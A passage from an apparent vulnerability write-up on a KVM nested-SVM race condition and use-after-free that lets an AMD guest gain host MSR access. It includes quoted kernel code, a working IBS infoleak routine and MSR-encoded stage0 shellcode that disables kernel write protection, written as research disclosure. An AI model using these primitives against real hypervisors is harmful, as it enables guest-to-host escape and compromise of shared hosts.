
        vmcb12_gpa = svm->vmcb->save.rax; ** 1 **
        ret = kvm_vcpu_map(&svm->vcpu, gpa_to_gfn(vmcb12_gpa), &map); ** 2 **
        ...
        ret = kvm_skip_emulated_instruction(&svm->vcpu);
        vmcb12 = map.hva;
        if (!nested_vmcb_checks(svm, vmcb12)) { ** 3 **
                vmcb12->control.exit_code    = SVM_EXIT_ERR;
                vmcb12->control.exit_code_hi = 0;
                vmcb12->control.exit_info_1  = 0;
                vmcb12->control.exit_info_2  = 0;
                goto out;
        }
        ...
        /*
         * Save the old vmcb, so we don't need to pick what we save, but can
         * restore everything when a VMEXIT occurs
         */
        hsave->save.es     = vmcb->save.es;
        hsave->save.cs     = vmcb->save.cs;
        hsave->save.ss     = vmcb->save.ss;
        hsave->save.ds     = vmcb->save.ds;
        hsave->save.gdtr   = vmcb->save.gdtr;
        hsave->save.idtr   = vmcb->save.idtr;
        hsave->save.efer   = svm->vcpu.arch.efer;
        hsave->save.cr0    = kvm_read_cr0(&svm->vcpu);
        hsave->save.cr4    = svm->vcpu.arch.cr4;
        hsave->save.rflags = kvm_get_rflags(&svm->vcpu);
        hsave->save.rip    = kvm_rip_read(&svm->vcpu);
        hsave->save.rsp    = vmcb->save.rsp;
        hsave->save.rax    = vmcb->save.rax;
        if (npt_enabled)
                hsave->save.cr3    = vmcb->save.cr3;
        else
                hsave->save.cr3    = kvm_read_cr3(&svm->vcpu);
        copy_vmcb_control_area(&hsave->control, &vmcb->control);
        svm->nested.nested_run_pending = 1;
        if (enter_svm_guest_mode(svm, vmcb12_gpa, vmcb12)) ** 4 **
                goto out_exit_err;
        if (nested_svm_vmrun_msrpm(svm))
                goto out;
out_exit_err:
        svm->nested.nested_run_pending = 0;
        svm->vmcb->control.exit_code    = SVM_EXIT_ERR;
        svm->vmcb->control.exit_code_hi = 0;
        svm->vmcb->control.exit_info_1  = 0;
        svm->vmcb->control.exit_info_2  = 0;
        nested_svm_vmexit(svm);
out:
        kvm_vcpu_unmap(&svm->vcpu, &map, true);
        return ret;
}

The function first fetches the value of RAX out of the currently active vmcb (svm->vmcb) in 1 (numbers are marked in the code samples). For guests using nested paging (which is the only relevant configuration nowadays) RAX contains a guest physical address (GPA), which needs to be translated into a host physical address (HPA) first. kvm_vcpu_map (2) takes care of this translation and maps the underlying page to a host virtual address (HVA) that can be directly accessed by KVM.

Once the VMCB is mapped, nested_vmcb_checks is called for some basic validation in 3. Afterwards, the L1 guest context which is stored in svm->vmcb is copied into the host save area svm->nested.hsave before KVM enters the nested guest context by calling enter_svm_guest_mode (4).

int enter_svm_guest_mode(struct vcpu_svm *svm, u64 vmcb12_gpa,
                         struct vmcb *vmcb12)
{
        int ret;
        svm->nested.vmcb12_gpa = vmcb12_gpa;
        load_nested_vmcb_control(svm, &vmcb12->control);
        nested_prepare_vmcb_save(svm, vmcb12);
        nested_prepare_vmcb_control(svm);
        ret = nested_svm_load_cr3(&svm->vcpu, vmcb12->save.cr3,
                                  nested_npt_enabled(svm));
        if (ret)
                return ret;
        svm_set_gif(svm, true);
        return 0;
}

static void load_nested_vmcb_control(struct vcpu_svm *svm,
                                     struct vmcb_control_area *control)
{
        copy_vmcb_control_area(&svm->nested.ctl, control);
        ...
}

Looking at enter_svm_guest_mode we can see that KVM copies the vmcb12 control area directly into svm->nested.ctl and does not perform any further checks on the copied value.

Readers familiar with double fetch or Time-of-Check-to-Time-of-Use vulnerabilities might already see a potential issue here: The call to nested_vmcb_checks at the beginning of nested_svm_vmrun performs all of its checks directly on the VMCB that is stored in guest memory, not on a private copy. This means that a guest with multiple CPU cores can modify fields in the VMCB after they are verified in nested_vmcb_checks, but before they are copied to svm->nested.ctl in load_nested_vmcb_control.
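The pattern can be reproduced outside the kernel with a toy model. The sketch below is not KVM code: struct toy_control, the bit position of TOY_INTERCEPT_VMRUN and the race_hook callback (which stands in for a second vCPU writing to guest memory at exactly the wrong moment) are all assumptions made for illustration. It contrasts a check-then-copy load with a copy-then-check load, which is one common way to close this kind of window.

```c
#include <stdbool.h>
#include <stdint.h>

#define TOY_INTERCEPT_VMRUN (1u << 0)  /* hypothetical bit position */

/* Toy stand-in for the part of the VMCB control area that matters here. */
struct toy_control {
    uint32_t intercepts;
    uint32_t asid;
};

/* Models a second vCPU writing to guest memory in the middle of a load. */
typedef void (*race_hook)(struct toy_control *guest_mem);

static bool toy_checks(const struct toy_control *c)
{
    return (c->intercepts & TOY_INTERCEPT_VMRUN) != 0 && c->asid != 0;
}

/* Double fetch: validate guest memory, then read it again for the copy. */
static bool load_double_fetch(struct toy_control *guest_mem,
                              struct toy_control *cached, race_hook hook)
{
    if (!toy_checks(guest_mem))      /* first fetch: time of check */
        return false;
    if (hook)
        hook(guest_mem);             /* the race window */
    *cached = *guest_mem;            /* second fetch: time of use */
    return true;
}

/* Single fetch: snapshot guest memory once, then validate the snapshot. */
static bool load_snapshot_first(struct toy_control *guest_mem,
                                struct toy_control *cached, race_hook hook)
{
    struct toy_control snap = *guest_mem;

    if (hook)
        hook(guest_mem);             /* too late to influence snap */
    if (!toy_checks(&snap))
        return false;
    *cached = snap;
    return true;
}

/* The racing write: clear the bit after it has been checked. */
static void clear_vmrun_intercept(struct toy_control *guest_mem)
{
    guest_mem->intercepts &= ~TOY_INTERCEPT_VMRUN;
}
```

Calling load_double_fetch with clear_vmrun_intercept as the hook leaves the cached copy without the VMRUN intercept bit even though the check passed, while load_snapshot_first caches exactly the values it validated.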

Let’s look at nested_vmcb_check_controls, the part of nested_vmcb_checks that validates the control area, to see what kind of checks we can bypass with this approach:

static bool nested_vmcb_check_controls(struct vmcb_control_area *control)
{
        if ((vmcb_is_intercept(control, INTERCEPT_VMRUN)) == 0)
                return false;
        if (control->asid == 0)
                return false;
        if ((control->nested_ctl & SVM_NESTED_CTL_NP_ENABLE) &&
            !npt_enabled)
                return false;
        return true;
}

At first glance this looks pretty harmless. control->asid isn’t used anywhere and the last check is only relevant for systems where nested paging isn’t supported. However, the first check turns out to be very interesting.

For reasons unknown to me, SVM VMCBs contain a bit that enables or disables interception of the VMRUN instruction when executed inside a guest. Clearing this bit isn’t actually supported by hardware and results in an immediate VMEXIT, so the check in nested_vmcb_check_controls simply replicates this behavior. When we race and bypass the check by repeatedly flipping the value of the INTERCEPT_VMRUN bit, we can end up in a situation where svm->nested.ctl contains a 0 in place of the INTERCEPT_VMRUN bit. To understand the impact, we first need to see how nested vmexits are handled in KVM:

The main SVM exit handler is the function handle_exit in arch/x86/kvm/svm/svm.c, which is called whenever a VM exit occurs. When KVM is running a nested guest, it first has to check if the exit should be handled by itself or the L1 hypervisor. To do this it calls the function nested_svm_exit_handled (5), which will return NESTED_EXIT_DONE if the vmexit will be handled by the L1 hypervisor and no further processing by the L0 hypervisor is needed:

static int handle_exit(struct kvm_vcpu *vcpu, fastpath_t exit_fastpath)
{
        struct vcpu_svm *svm = to_svm(vcpu);
        struct kvm_run *kvm_run = vcpu->run;
        u32 exit_code = svm->vmcb->control.exit_code;
        ...
        if (is_guest_mode(vcpu)) {
                int vmexit;
                trace_kvm_nested_vmexit(exit_code, vcpu, KVM_ISA_SVM);
                vmexit = nested_svm_exit_special(svm);
                if (vmexit == NESTED_EXIT_CONTINUE)
                        vmexit = nested_svm_exit_handled(svm); ** 5 **
                if (vmexit == NESTED_EXIT_DONE)
                        return 1;
        }
        ...
}

static int nested_svm_intercept(struct vcpu_svm *svm)
{
        // exit_code==INTERCEPT_VMRUN when the L2 guest executes vmrun
        u32 exit_code = svm->vmcb->control.exit_code;
        int vmexit = NESTED_EXIT_HOST;
        switch (exit_code) {
        case SVM_EXIT_MSR:
                vmexit = nested_svm_exit_handled_msr(svm);
                break;
        case SVM_EXIT_IOIO:
                vmexit = nested_svm_intercept_ioio(svm);
                break;
        ...
        default: {
                if (vmcb_is_intercept(&svm->nested.ctl, exit_code)) ** 7 **
                        vmexit = NESTED_EXIT_DONE;
        }
        }
        return vmexit;
}

int nested_svm_exit_handled(struct vcpu_svm *svm)
{
        int vmexit;
        vmexit = nested_svm_intercept(svm); ** 6 **
        if (vmexit == NESTED_EXIT_DONE)
                nested_svm_vmexit(svm); ** 8 **
        return vmexit;
}

nested_svm_exit_handled first calls nested_svm_intercept (6) to see if the exit should be handled. When we trigger an exit by executing VMRUN in an L2 guest, the default case is executed (7) to see if the INTERCEPT_VMRUN bit in svm->nested.ctl is set. Normally, this should always be the case and the function returns NESTED_EXIT_DONE to trigger a nested VM exit from L2 to L1 and to let the L1 hypervisor handle the exit (8). (This way, KVM supports infinite nesting of hypervisors.)
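The routing decision in the default case boils down to a single bit test against the cached control area. The following is a simplified model, not the KVM implementation: struct toy_nested_ctl, the one-bit-per-exit-code layout and the value of TOY_EXIT_VMRUN are assumptions chosen to keep the example small.

```c
#include <stdbool.h>
#include <stdint.h>

enum toy_exit_route {
    TOY_EXIT_HOST,  /* L0 (KVM) handles the exit itself */
    TOY_EXIT_DONE   /* exit is reflected to the L1 hypervisor */
};

/* Hypothetical numbering: one intercept bit per exit code, 256 codes. */
#define TOY_EXIT_VMRUN 0x80u

/* Toy stand-in for the cached copy of the L1-provided control area. */
struct toy_nested_ctl {
    uint32_t intercepts[8];
};

static bool toy_is_intercept(const struct toy_nested_ctl *ctl, uint32_t bit)
{
    return (ctl->intercepts[bit / 32] >> (bit % 32)) & 1u;
}

/* Decide who handles an exit taken while the nested (L2) guest is running. */
static enum toy_exit_route toy_route_exit(const struct toy_nested_ctl *ctl,
                                          uint32_t exit_code)
{
    if (exit_code < 256 && toy_is_intercept(ctl, exit_code))
        return TOY_EXIT_DONE;
    return TOY_EXIT_HOST;
}
```

With the bit set, a VMRUN exit from L2 is routed to L1. With the bit cleared, the same exit is routed to the host, which is the state the validation is supposed to rule out.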

However, if the L1 guest exploited the race condition described above, svm->nested.ctl won’t have the INTERCEPT_VMRUN bit set and the VM exit will be handled by KVM itself. This results in a second call to nested_svm_vmrun while still running inside the L2 guest context. nested_svm_vmrun isn’t written to handle this situation and will blindly overwrite the L1 context stored in svm->nested.hsave with data from the currently active svm->vmcb, which contains data for the L2 guest:

        /*
         * Save the old vmcb, so we don't need to pick what we save, but can
         * restore everything when a VMEXIT occurs
         */
        hsave->save.es     = vmcb->save.es;
        hsave->save.cs     = vmcb->save.cs;
        hsave->save.ss     = vmcb->save.ss;
        hsave->save.ds     = vmcb->save.ds;
        hsave->save.gdtr   = vmcb->save.gdtr;
        hsave->save.idtr   = vmcb->save.idtr;
        hsave->save.efer   = svm->vcpu.arch.efer;
        hsave->save.cr0    = kvm_read_cr0(&svm->vcpu);
        hsave->save.cr4    = svm->vcpu.arch.cr4;
        hsave->save.rflags = kvm_get_rflags(&svm->vcpu);
        hsave->save.rip    = kvm_rip_read(&svm->vcpu);
        hsave->save.rsp    = vmcb->save.rsp;
        hsave->save.rax    = vmcb->save.rax;
        if (npt_enabled)
                hsave->save.cr3    = vmcb->save.cr3;
        else
                hsave->save.cr3    = kvm_read_cr3(&svm->vcpu);
        copy_vmcb_control_area(&hsave->control, &vmcb->control);

This becomes a security issue due to the way Model Specific Register (MSR) intercepts are handled for nested guests:

SVM uses a permission bitmap to control which MSRs can be accessed by a VM. The bitmap is an 8KB data structure with two bits per MSR, one of which controls read access and the other write access. A 1 bit means the access is intercepted and triggers a VM exit; a 0 bit means the VM has direct access to the MSR. The HPA of the bitmap is stored in the VMCB control area and for normal L1 KVM guests, the pages are allocated and pinned into memory as soon as a vCPU is created.
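To make the two-bits-per-MSR layout concrete, here is a small lookup sketch. It is not KVM code. The three covered MSR ranges and the choice of the low bit for reads and the high bit for writes follow my reading of the AMD manual and should be treated as assumptions, as should the rule that MSRs outside the covered ranges are always intercepted. The function names are made up for this example.

```c
#include <stdbool.h>
#include <stdint.h>

#define MSRPM_RANGE_MSRS  0x2000u  /* MSRs covered per range */
#define MSRPM_RANGE_BYTES 0x800u   /* 2 bits per MSR -> 2KB per range */

/*
 * Return the bit offset of the read-intercept bit for an MSR within the
 * 8KB bitmap, or -1 if the MSR is not covered by the bitmap at all.
 */
static long msrpm_read_bit(uint32_t msr)
{
    static const uint32_t range_base[3] = {
        0x00000000u, 0xC0000000u, 0xC0010000u
    };

    for (int r = 0; r < 3; r++) {
        if (msr >= range_base[r] && msr - range_base[r] < MSRPM_RANGE_MSRS)
            return (long)r * MSRPM_RANGE_BYTES * 8 +
                   (long)(msr - range_base[r]) * 2;
    }
    return -1;
}

/* Would this access trigger a VM exit under the given bitmap? */
static bool msr_access_intercepted(const uint8_t *msrpm, uint32_t msr,
                                   bool write)
{
    long bit = msrpm_read_bit(msr);

    if (bit < 0)
        return true;            /* assumption: uncovered MSRs always exit */
    if (write)
        bit += 1;               /* write bit follows the read bit */
    return (msrpm[bit / 8] >> (bit % 8)) & 1;
}
```

Under these assumptions, the bits for VM_HSAVE_PA (MSR 0xC0010117) live in byte 0x1045 of the bitmap. A bitmap page that has been zeroed therefore intercepts nothing in the covered ranges, which is why reuse of the backing pages matters so much for what follows.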

For a nested guest, the MSR permission bitmap is stored in svm->nested.msrpm and its physical address is copied into the active VMCB (in svm->vmcb->control.msrpm_base_pa) while the nested guest is running. Using the described double invocation of nested_svm_vmrun, a malicious guest can copy this value into the svm->nested.hsave VMCB when copy_vmcb_control_area is executed. This is interesting because KVM’s hsave area normally only contains data from the L1 guest context, so svm->nested.hsave->control.msrpm_base_pa would normally point to the pinned vCPU-specific MSR bitmap pages.

This edge case becomes exploitable thanks to a relatively recent change in KVM:

Since commit “2fcf4876: KVM: nSVM: implement on demand allocation of the nested state” from last October, svm->nested.msrpm is dynamically allocated and freed when a guest changes the SVME bit of the MSR_EFER register:

int svm_set_efer(struct kvm_vcpu *vcpu, u64 efer)
{
        struct vcpu_svm *svm = to_svm(vcpu);
        u64 old_efer = vcpu->arch.efer;
        vcpu->arch.efer = efer;
        if ((old_efer & EFER_SVME) != (efer & EFER_SVME)) {
                if (!(efer & EFER_SVME)) {
                        svm_leave_nested(svm);
                        svm_set_gif(svm, true);
                        ...
                        /*
                         * Free the nested guest state, unless we are in SMM.
                         * In this case we will return to the nested guest
                         * as soon as we leave SMM.
                         */
                        if (!is_smm(&svm->vcpu))
                                svm_free_nested(svm);
                } ...
        }
}

For the “disable SVME” case, KVM will first call svm_leave_nested to forcibly leave potential nested guests and then free the svm->nested data structures (including the backing pages for the MSR permission bitmap) in svm_free_nested. As svm_leave_nested believes that svm->nested.hsave contains the saved context of the L1 guest, it simply copies its control area to the real VMCB:

void svm_leave_nested(struct vcpu_svm *svm)
{
        if (is_guest_mode(&svm->vcpu)) {
                struct vmcb *hsave = svm->nested.hsave;
                struct vmcb *vmcb = svm->vmcb;
                ...
                copy_vmcb_control_area(&vmcb->control, &hsave->control);
                ...
        }
}

But as mentioned before, svm->nested.hsave->control.msrpm_base_pa can still point to svm->nested.msrpm. Once svm_free_nested is finished and KVM passes control back to the guest, the CPU will use the freed pages for its MSR permission checks. This gives a guest unrestricted access to host MSRs if the pages are reused and partially overwritten with zeros.

To summarize, a malicious guest can gain access to host MSRs using the following approach:

  1. Enable the SVME bit in MSR_EFER to enable nested virtualization
  2. Repeatedly try to launch an L2 guest using the VMRUN instruction while flipping the INTERCEPT_VMRUN bit on a second CPU core.
  3. If VMRUN succeeds, try to launch an “L3” guest using another invocation of VMRUN. If this fails, we have lost the race in step 2 and must try again. If it succeeds, we have successfully overwritten svm->nested.hsave with our L2 context.
  4. Clear the SVME bit in MSR_EFER while still running in the “L3” context. This frees the MSR permission bitmap backing pages used by the L2 guest, which is now executing again.
  5. Wait until the KVM host reuses the backing pages. This will potentially clear all or some of the bits, giving the guest access to host MSRs.

When I initially discovered and reported this vulnerability, I was feeling pretty confident that this type of MSR access should be more or less equivalent to full code execution on the host. While my feeling turned out to be correct, getting there still took me multiple weeks of exploit development. In the next section I’ll describe the steps to turn this primitive into a guest-to-host escape.

The Exploit

Assuming our guest can get full unrestricted access to any MSR (which is only a question of timing thanks to init_on_alloc=1 being the default for most modern distributions), how can we escalate this into running arbitrary code in the context of the KVM host? To answer this question we first need to look at what kind of MSRs are supported on a modern AMD system. Looking at the BIOS and Kernel Developer’s Guide for recent AMD processors we can find a wide range of MSRs starting with well known and widely used ones such as EFER (the Extended Feature Enable Register) or LSTAR (the syscall target address) to rarely used ones like SMI_ON_IO_TRAP (can be used to generate a System Management Mode Interrupt when specific IO port ranges are accessed).

Looking at the list, several registers like LSTAR or KERNEL_GSBASE seem like interesting targets for redirecting the execution of the host kernel. Unrestricted access to these registers is actually enabled by default. However, they are automatically restored to a valid state by KVM after a vmexit, so modifying them does not lead to any changes in host behavior.

Still, there is one MSR that we previously mentioned and that seems to give us a straightforward way to achieve code execution: VM_HSAVE_PA, which stores the physical address of the host save area used to restore the host context when a vmexit occurs. If we can point this MSR at a memory location under our control, we should be able to fake a malicious host context and execute our own code after a vmexit.

While this sounds pretty straightforward in theory, implementing it still has some challenges:

  • AMD is pretty clear about the fact that software should not touch the host save area in any way and that the data stored in this area is CPU-dependent: “Processor implementations may store only part or none of host state in the memory area pointed to by VM_HSAVE_PA MSR and may store some or all host state in hidden on-chip memory. Different implementations may choose to save the hidden parts of the host’s segment registers as well as the selectors. For these reasons, software must not rely on the format or contents of the host state save area, nor attempt to change host state by modifying the contents of the host save area.” (AMD64 Architecture Programmer’s Manual, Volume 2: System Programming, Page 477). To strengthen the point, the format of the host save area is undocumented.
  • Debugging issues involving an invalid host state is very tedious as any issue leads to an immediate processor shutdown. Even worse, I wasn’t sure if rewriting the VM_HSAVE_PA MSR while running inside a VM can even work. It’s not really something that should happen during normal operation so in the worst case scenario, overwriting the MSR would just lead to an immediate crash.
  • Even if we can create a valid (but malicious) host save area in our guest, we still need some way to identify its host physical address (HPA). Because our guest runs with nested paging enabled, physical addresses that we can see in the guest (GPAs) are still one address translation away from their HPA equivalent.

After spending some time scrolling through AMD’s documentation, I still decided that VM_HSAVE_PA seemed to be the best way forward and set out to tackle these problems one by one.

After dumping the host save area of a normal KVM guest running on an AMD EPYC 7351P CPU, the first problem goes away quickly: As it turns out, the host save area has the same layout as a normal VMCB with only a couple of relevant fields initialized. Even better, the initialized fields include all the saved host information documented in the AMD manual so the fear that all interesting host state is stored in on-chip memory seems to be unfounded.

Saving Host State. To ensure that the host can resume operation after #VMEXIT, VMRUN saves at least the following host state information:

  • CS.SEL, NEXT_RIP—The CS selector and rIP of the instruction following the VMRUN. On #VMEXIT the host resumes running at this address.
  • RFLAGS, RAX—Host processor mode and the register used by VMRUN to address the VMCB.
  • SS.SEL, RSP—Stack pointer for host
  • CR0, CR3, CR4, EFER—Paging/operating mode for host
  • IDTR, GDTR—The pseudo-descriptors. VMRUN does not save or restore the host LDTR.
  • ES.SEL and DS.SEL.

Under the mistaken assumption that I solved the problem of creating a fake but valid host save area, I decided to look into building an infoleak that gives me the ability to translate GPAs to HPAs. A couple hours of manual reading led me to an AMD-specific performance monitoring feature called Instruction Based Sampling (IBS). When IBS is enabled by writing the right magic invocation to a set of MSRs, it samples every Nth instruction that is executed and collects a wide range of information about the instruction. This information is logged in another set of MSRs and can be used to analyze the performance of any piece of code running on the CPU. While most of the documentation for IBS is pretty sparse or hard to follow, the very useful open source project AMD IBS Toolkit contains working code, a readable high level description of IBS and a lot of useful references.

IBS supports two different modes of operation, one that samples Instruction fetches and one that samples micro-ops (which you can think of as the internal RISC representation of more complex x64 instructions). Depending on the operation mode, different data is collected. Besides a lot of caching and latency information that we don’t care about, fetch sampling also returns the virtual address and physical address of the fetched instruction. Op sampling is even more useful as it returns the virtual address of the underlying instruction as well as virtual and physical addresses accessed by any load or store micro op.

Interestingly, IBS does not seem to care about the virtualization context of its user and every physical address returned by it is an HPA (of course this is not a problem outside of this exploit, as guest accesses to the IBS MSRs will normally be restricted). The wide range of data returned by IBS and the fact that it’s completely driven by MSR reads and writes make it the perfect tool for building infoleaks for our exploit.

Building a GPA -> HPA leak boils down to enabling IBS ops sampling, executing a lot of instructions that access a specific memory page in our VM and reading the IBS_DC_PHYS_AD MSR to find out its HPA:

// This function leaks the HPA of a guest page using
// AMD's Instruction Based Sampling. We try to sample
// one of our memory loads/writes to *p, which will
// store the physical memory address in MSR_IBS_DC_PHYS_AD
static u64 leak_guest_hpa(u8 *p) {
  volatile u8 *ptr = p;
  u64 ibs = scatter_bits(0x2, IBS_OP_CUR_CNT_23) |
            scatter_bits(0x10, IBS_OP_MAX_CNT) | IBS_OP_EN;
  while (true) {
    wrmsr(MSR_IBS_OP_CTL, ibs);
    u64 x = 0;
    for (int i = 0; i < 0x1000; i++) {
      x = ptr[i];
      ptr[i] += ptr[i - 1];
      ptr[i] = x;
      if (i % 50 == 0) {
        u64 valid = rdmsr(MSR_IBS_OP_CTL) & IBS_OP_VAL;
        if (valid) {
          u64 op3 = rdmsr(MSR_IBS_OP_DATA3);
          if ((op3 & IBS_ST_OP) || (op3 & IBS_LD_OP)) {
            if (op3 & IBS_DC_PHY_ADDR_VALID) {
              printf("[x] leak_guest_hpa: %lx %lx %lx\n", rdmsr(MSR_IBS_OP_RIP),
                     rdmsr(MSR_IBS_DC_PHYS_AD), rdmsr(MSR_IBS_DC_LIN_AD));
              return rdmsr(MSR_IBS_DC_PHYS_AD) & ~(0xFFF);
            }
          }
          wrmsr(MSR_IBS_OP_CTL, ibs);
        }
      }
    }
    wrmsr(MSR_IBS_OP_CTL, ibs & ~IBS_OP_EN);
  }
}

Using this infoleak primitive, I started to create a fake host save area by preparing my own page tables (for pointing CR3 at them), interrupt descriptor tables and segment descriptors and pointing RIP to a primitive shellcode that would write to the serial console. Of course, my first tries immediately crashed the whole system and even after spending multiple days to make sure everything was set up correctly, the system would crash immediately once I pointed the hsave MSR at my own location.

After getting frustrated with the total lack of progress, watching my server reboot for the hundredth time, trying to come up with a different exploitation strategy for two weeks and learning about the surprising regularity of physical page migrations on Linux, I realized that I made an important mistake. Just because the CPU initializes all the expected fields in the host save area, it is not safe to assume that these fields are actually used for restoring the host context. Slow trial and error led to the discovery that my AMD EPYC CPU ignores everything in the host save area besides the values of the RIP, RSP and RAX registers.

While this register control would make a local privilege escalation straightforward, escaping the VM boundary is a bit more complicated. RIP and RSP control make launching a kernel ROP chain the next logical step, but this requires us to first break the host kernel's address randomization and to find a way to store controlled data at a known host virtual address (HVA).

Fortunately, we have IBS as a powerful infoleak building primitive and can use it to gather all required information in a single run:

  • Leaking the host kernel's (or more specifically kvm-amd.ko’s) base address can be done by enabling IBS sampling with a small sampling interval and immediately triggering a VM exit. When VM execution continues, the IBS result MSRs will contain the HVA of instructions executed by KVM during the exit handling.
  • The most powerful way to store data at a known HVA is to leak the location of the kernel’s linear mapping (also known as physmap), a 1:1 mapping of all physical pages on the system. This gives us a GPA->HVA translation primitive by first using our GPA->HPA infoleak from above and then adding the HPA to the physmap base address. Leaking the physmap is possible by sampling micro ops in the host kernel until we find a read or write operation, where the lower ~30 bits of the accessed virtual address and physical address are identical.
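The arithmetic behind the physmap leak and the resulting translation primitive is short enough to write down. This is only a sketch of the idea described in the bullets above: the helper names are made up, the kernel-half boundary assumes 4-level paging, and comparing exactly 30 low bits assumes that the physmap base is 1 GiB aligned, which is what the "~30 bits" in the text suggests. A single matching sample is only a hint, since other kernel mappings can agree with their physical address in the low bits too, so a real filter would want several consistent samples.

```c
#include <stdbool.h>
#include <stdint.h>

#define LOW30_MASK        ((UINT64_C(1) << 30) - 1)
#define KERNEL_HALF_START UINT64_C(0xffff800000000000)  /* 4-level paging */

/* Does a sampled (virtual, physical) pair look like a physmap access? */
static bool looks_like_physmap_access(uint64_t hva, uint64_t hpa)
{
    return hva >= KERNEL_HALF_START && ((hva ^ hpa) & LOW30_MASK) == 0;
}

/* The physmap maps physical address P at base + P, so base = HVA - HPA. */
static uint64_t physmap_base_from_sample(uint64_t hva, uint64_t hpa)
{
    return hva - hpa;
}

/* Second half of the GPA -> HPA -> HVA chain. */
static uint64_t hpa_to_hva(uint64_t physmap_base, uint64_t hpa)
{
    return physmap_base + hpa;
}
```

Once the base is known, any HPA obtained through the GPA->HPA leak can be turned into a host virtual address with a single addition.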

Having all these building blocks in place, we could now try to build a kernel ROP chain that executes some interesting payload. However, there is one important caveat. When we take over execution after a vmexit, the system is still in a somewhat unstable state. As mentioned above, SVM’s context switching is very minimal and we are at least one VMLOAD instruction and reenabling of interrupts away from a usable system. While it is surely possible to exploit this bug and to restore the original host context using a sufficiently complex ROP chain, I decided to find a way to run my own code instead.

A couple of years ago, the Linux physmap was still mapped executable and executing our own code would be as simple as jumping to a physmap mapping of one of our guest pages. Of course, that is not possible anymore and the kernel tries hard to not have any memory pages mapped as writable and executable. Still, page protections only apply to virtual memory accesses, so why not use an instruction that directly writes controlled data to a physical address? As you might remember from our initial discussion of SVM earlier in this post, SVM supports an instruction called VMSAVE to store hidden guest state (or host state) in a VMCB. Similar to VMRUN, VMSAVE takes the physical address of a VMCB in the RAX register as an implicit argument. It then writes the following register state to the VMCB:

  • FS, GS, TR, LDTR
  • KernelGsBase
  • STAR, LSTAR, CSTAR, SFMASK
  • SYSENTER_CS, SYSENTER_ESP, SYSENTER_EIP

For us, VMSAVE is interesting for a couple of reasons:

  • It is used as part of KVM’s normal SVM exit handler and can be easily integrated into a minimal ROP chain.
  • It operates on physical addresses, so we can use it to write to an arbitrary memory location including KVM’s own code.
  • All written registers still contain the guest values set by our VM, allowing us to control the written content with some restrictions

VMSAVE’s biggest downside as an exploitation primitive is that RAX needs to be page aligned, reducing our control of the target address. VMSAVE writes to the memory offsets 0x440-0x480 and 0x600-0x638 so we need to be careful about not corrupting any memory that’s in use.

In our case this turns out to be a non-issue, as KVM contains a couple of code pages where functions that are rarely or never used (e.g. cleanup_module or SEV-specific code) are stored at these offsets.
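Picking a target page comes down to checking which functions on it overlap the bytes VMSAVE will write. The helper below sketches that check. The two ranges are copied from the text above, treating their end offsets as inclusive is an assumption, and the function names are invented for this example.

```c
#include <stdbool.h>
#include <stdint.h>

/* Inclusive byte range within a 4KB page. */
struct byte_range {
    uint32_t start;
    uint32_t end;
};

/* Offsets written by VMSAVE, as quoted in the text. */
static const struct byte_range vmsave_ranges[] = {
    { 0x440, 0x480 },
    { 0x600, 0x638 },
};

/* VMSAVE requires RAX to hold a page-aligned physical address. */
static bool is_page_aligned(uint64_t pa)
{
    return (pa & 0xfff) == 0;
}

/* Would VMSAVE overwrite any byte in the page offsets [start, end]? */
static bool vmsave_clobbers(uint32_t start, uint32_t end)
{
    unsigned n = sizeof(vmsave_ranges) / sizeof(vmsave_ranges[0]);

    for (unsigned i = 0; i < n; i++) {
        if (start <= vmsave_ranges[i].end && end >= vmsave_ranges[i].start)
            return true;
    }
    return false;
}
```

A page is a suitable target when every function that vmsave_clobbers flags on it is one the host will not execute, such as the rarely used functions mentioned above.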

While we don’t have full control over the written data and valid register values are somewhat restricted, it is still possible to write a minimal stage0 shellcode to an arbitrary page in the host kernel by filling guest MSRs with the right values. My exploit uses the STAR, LSTAR and CSTAR registers for this, which are written to the offsets 0x600, 0x608 and 0x610 of the target page. As all three registers need to contain canonical addresses, we can only use parts of the registers for our shellcode and use relative jumps to skip the unusable parts of the STAR and LSTAR MSRs:

  // mov cr0, rbx; jmp
  wrmsr(MSR_STAR, 0x00000003ebc3220fULL);
  // pop rdi; pop rsi; pop rcx; jmp
  wrmsr(MSR_LSTAR, 0x00000003eb595e5fULL);
  // rep movsb; pop rdi; jmp rdi;
  wrmsr(MSR_CSTAR, 0xe7ff5fa4f3ULL);

The above code makes use of the fact that we control the value of the RBX register and the stack when we return to it as part of our initial ROP chain. First, we copy the value of RBX (0x80040033) into CR0, which disables Write Protection (WP) for kernel memory accesses. This makes all of the kernel code writable on this CPU allowing us to copy a larger stage1 shellcode to an arbitrary unused memory location and jump to it.
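Two details of the stage0 snippet can be checked mechanically: how the three MSR values line up as bytes in memory, and what the CR0 value does. The sketch below uses the three constants from the wrmsr calls above and assumes that the registers end up as consecutive little-endian 8-byte values. The helper names are invented, and 0x80050033 in the usage note is only an illustrative CR0 value with WP (bit 16) set.

```c
#include <stddef.h>
#include <stdint.h>

#define CR0_WP (UINT64_C(1) << 16)  /* Write Protect bit in CR0 */

/* Store a 64-bit value in little-endian byte order. */
static void store_le64(uint8_t *dst, uint64_t v)
{
    for (int i = 0; i < 8; i++)
        dst[i] = (uint8_t)(v >> (8 * i));
}

/* Lay out STAR, LSTAR and CSTAR as three consecutive 8-byte values. */
static void layout_stage0(uint8_t out[24])
{
    store_le64(out + 0,  UINT64_C(0x00000003ebc3220f));  /* STAR  */
    store_le64(out + 8,  UINT64_C(0x00000003eb595e5f));  /* LSTAR */
    store_le64(out + 16, UINT64_C(0x000000e7ff5fa4f3));  /* CSTAR */
}

/* Target of a two-byte short jump (opcode 0xeb, rel8) located at off. */
static size_t short_jmp_target(const uint8_t *code, size_t off)
{
    return off + 2 + (size_t)(int8_t)code[off + 1];
}

/* Is kernel write protection enabled for this CR0 value? */
static int cr0_wp_enabled(uint64_t cr0)
{
    return (cr0 & CR0_WP) != 0;
}
```

After layout_stage0, the jump at offset 3 lands at offset 8 and the jump at offset 11 lands at offset 16, so execution flows from the STAR bytes through LSTAR into CSTAR while skipping the zero padding. cr0_wp_enabled(0x80040033) is false, whereas the same value with bit 16 set (0x80050033) has WP enabled.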

